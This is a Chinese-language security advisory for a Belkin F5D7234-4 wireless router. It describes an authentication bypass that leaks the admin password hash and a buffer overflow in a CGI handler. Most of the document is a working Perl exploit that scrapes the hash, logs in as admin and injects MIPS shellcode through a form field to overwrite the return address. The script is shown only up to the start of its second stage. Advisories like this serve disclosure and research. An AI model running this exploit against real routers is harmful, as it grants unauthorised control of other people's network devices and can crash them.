4 G Wireless Router身份验证绕过和远程代码执行漏洞

发布日期：2013-08-26
更新日期：2013-08-28

受影响系统：
Belkin F5D8236-4
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 61994

Belkin F5D7234-4 G是无线路由器产品。

Belkin F5D7234-4 G Wireless Router，固件版本5.00.12，存在身份验证绕过漏洞和远程代码执行漏洞，攻击者利用这些漏洞可获取设备管理员登录密码、造成拒绝服务、执行未授权操作。身份验证绕过漏洞源于对$ip/login.stm的处理程序存在问题，可导致泄漏管理员登录密码哈希值。远程代码执行漏洞源于$ip/cgi-bin/wireless_WPS_Enroll.exe的处理程序存在问题，可能导致缓冲区溢出。

<*来源：Aodrulez
 
  链接：
*>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

#!/usr/bin/perl

use strict;
use warnings;
use LWP 5.64;
$| = 1;

# Variable declarations.
my $browser = LWP::UserAgent->new;
my $passHash="";
my $url ="";
my $response ="";
my $ip="";
$browser ->timeout(10);

# Just a few nops followed by a dummy shellcode that crashes & reboots the router.
my $shellcode="\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x04\xd0\xff\xff\x20\x20\x20\x20";

sub Authenticate()
{
  print "[+] Trying to authenticate.\n";
  $url= "http://$ip/login.stm";
  $response = $browser->get( $url);
  my @aod= $response->content =~ m/var password = "(.*)";/g;
  if(!$aod[0])
  {
    print "[-] Damn! Something went wrong. This might not work here :-/\n";
    exit;
  }
  else
  {
    $passHash=$aod[0];
    print "[+] Admin Password = $passHash (MD5 Hash).\n";
  }

print "[+] Time to authenticate you!\n";
$url = "http://$ip/cgi-bin/login.exe";
$response = $browser->post( $url,
    [ 'totalMSec' => "1377121454.99",
      'pws' => "$passHash",
    ,]
  );
 
  if( $response->content =~ /index/ )
  {
    print "[+] Logged in successfully as 'Admin'!\n";
    print "[!] Open this link in a browser for admin access : $ip/setup.htm \n";
  } else {
    print "[-] Login failed! This might not work here :-/\n";
    exit;
  }

print "\n[+] Continue with exploitation? (Y/N) : ";
  my $temp=<STDIN>;
  if ($temp=~"Y" || $temp=~"y")
  {
    Exploit();
  }
  else
  {
    print "[+] Have fun!\n\n";
    exit;
  }
}

sub Exploit()
{
# Stage 1: Fill shellcode at a known location : 0x803c0278 (Buffer=120 bytes)
# 0x803c0278 is fixed for this device/firmware combination.
  print "[+] Stage 1 : Allocating shellcode.\n";

if (length($shellcode) > 120)
  {
  print "[-] Shellcode is too big! (120 bytes Max)\n";
  exit;
  }
  print "[+] Shellcode length : ".length($shellcode)."\n";

# Fill the rest with nops. Not needed but good to have.
  # Shellcode size should be ideally a multiple of 4 as this is MIPS.
  my $nopsize=120-length($shellcode);
  $shellcode=$shellcode.("\x20"x$nopsize);

$url = "http://$ip/cgi-bin/wireless_WPA.exe";
$response = $browser->post( $url,
    [ 'wpa_authen' => "1",
      'wpa_psk' => '0',
      's_rekeysec' => '900000',
      's_rekeypkt' => '1000',
      'w802_rekey' => '0',
      'encryption' => '3',
      'security_type' => '4',
      'authentication' => '3',
      'encryption_hid' => '3',
      'wpa_key_text' => "ssss",
      'wpa_key_pass' => "$shellcode",
      'obscure_psk' => '1',
      'sharedkey_alter' => '',
      'sharedkey_alter1' => '1',
     
    ,]
  );
 
  if( !$response->content )
  {
    print "[-] Damn! Something went wrong. This might not work here :-/\n";
  }
  else
  { 
    print "[+] Stage 1 seems to have gone well.\n";
  }

# Stage 2: Trigger Stack Overflow & overwrite RA
print "[+] Stage 2 : Triggering Return Address overwrite.\n";